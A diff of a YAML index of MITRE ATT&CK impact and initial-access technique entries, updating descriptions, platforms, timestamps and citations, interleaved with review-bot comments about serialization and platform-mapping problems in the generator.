+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
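Review bot: this hunk drops `spec_version: '2.1'` from T1491.001 even though nothing else about that object changes (its `x_mitre_attack_spec_version: 2.1.0` and 2022 `modified` stay), which indicates the generator now strips `spec_version` from every object, not that the upstream object changed; the same removal recurs throughout the patch. Please confirm no downstream consumer of this index reads `spec_version`, and note the generator change in the commit message. Separately, the two new entries T1496.004 and T1496.001 land with `x_mitre_detection: ''` and `atomic_tests: []`, so they will appear in the index with no detection guidance and no tests; that is expected for fresh sub-techniques, but the new entries also use a different key order (`modified`, `name`, `description` first) from the retained entries above them (`description`, `modified`, `created_by_ref`, `name`), so the file now mixes two serializations.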
@@ -58287,11 +59266,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -58314,6 +59292,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -58331,9 +59310,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
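Review bot: the platform list for T1531 replaces the literal `Office 365` with `Office Suite` and adds `IaaS`. Any per-platform CSV index or filter that is keyed on the old string `Office 365` will silently lose T1531 (and every other technique renamed the same way in this patch), so check that the platform-to-index mapping in the generator knows about `Office Suite`, and that an `Office 365` index is either renamed or regenerated alongside this change rather than left with stale contents.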
@@ -58359,9 +59339,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests: []
T1486:
@@ -58448,7 +59427,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
@@ -58472,12 +59451,11 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests: []
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58496,7 +59474,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -58513,18 +59490,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
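Review bot: for T1499 this hunk removes `IaaS` from the middle of the platform list and re-adds it at the end, and `x_mitre_modified_by_ref` is removed here only to be re-emitted further down in the same object, so most of the lines are reordering noise rather than change. The substantive change is the net removal of `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` from Endpoint Denial of Service. Consider having the generator emit platforms and object keys in a stable order so that the actual platform removals are the only lines a reviewer has to read.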
@@ -58548,8 +59520,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -58569,33 +59541,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
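Review bot: the rewritten T1496 description enumerates four forms of resource hijacking (compute for cryptocurrency mining, selling network bandwidth, generating SMS traffic, abusing cloud messaging services), but this patch only adds sub-technique entries for compute hijacking (T1496.001) and cloud service hijacking (T1496.004). If the upstream bundle also defines sub-techniques for the bandwidth and SMS cases, they are missing from this regeneration and the index will be incomplete relative to the parent description; if they are added in another part of the patch, say so in the commit message. The old description's citations to GoBotKR and Sysdig Proxyjacking are no longer referenced by the new text, which is consistent with their removal from `external_references` below.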
@@ -58606,7 +59567,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -58623,8 +59584,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
@@ -58643,99 +59607,73 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests: []
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
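Review bot: the T1565.002 portion of this hunk is almost entirely a key reorder: `id`, `created`, `x_mitre_version: '1.1'`, the platform list and the two citations are all unchanged, and the only real differences are `modified` (2022-05-11 to 2024-08-26), the FireEye citation URL moving to mandiant.com, and `x_mitre_attack_spec_version` going from 2.1.0 to 3.2.0. A deterministic key order in the serializer would reduce this to a handful of lines. For T1496, the removed `external_references` match the citations dropped from its new description, and the cryptomining references (Kaspersky, CloudSploit, Unit 42, Trend Micro) now live under T1496.001, so nothing cited is orphaned.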
@@ -58744,7 +59682,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58770,9 +59708,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
@@ -58828,55 +59767,11 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests: []
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58891,6 +59786,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -58903,16 +59802,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
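Review bot: the net effect for T1498 is the removal of `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` from its platforms, leaving `Windows`, `IaaS`, `Linux`, `macOS` and `Containers`, which mirrors the T1499 change earlier in the patch. Both Denial of Service techniques therefore disappear from any SaaS or identity-platform index CSV that is generated from these platform lists, so those CSVs need to be regenerated in the same change, and the commit message should call out that this is an upstream ATT&CK platform scoping change rather than a local edit. The object also gains `x_mitre_deprecated: false` and `revoked: false`, which the previous serialization lacked; that is fine but worth mentioning alongside the `spec_version` removal as a generator-level change.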
@@ -58980,11 +59915,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -59002,7 +59936,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -59029,7 +59963,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -59079,13 +60013,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests: []
T1561.001:
@@ -59153,11 +60086,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
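Review bot: the `modified` timestamp for T1529 moves backwards in this hunk (`- modified: '2023-05-09T14:00:00.188Z'` to `+ modified: '2023-03-22T20:45:22.531Z'`), and the same regression appears below for T1133, T1195.003, T1195.002, T1200 and T1029. The old values on several of these objects share the identical stamp `2023-05-09T14:00:00.188Z`, which looks like a bulk restamp rather than a per-object edit, so the new values may well be the correct upstream ones; please confirm which ATT&CK release the generator consumed and that it is not reading a stale cache, since consumers that use `modified` to detect changed techniques will otherwise see spurious updates.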
@@ -59222,13 +60154,12 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests: []
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -59306,7 +60237,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1195.001:
@@ -59356,11 +60286,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
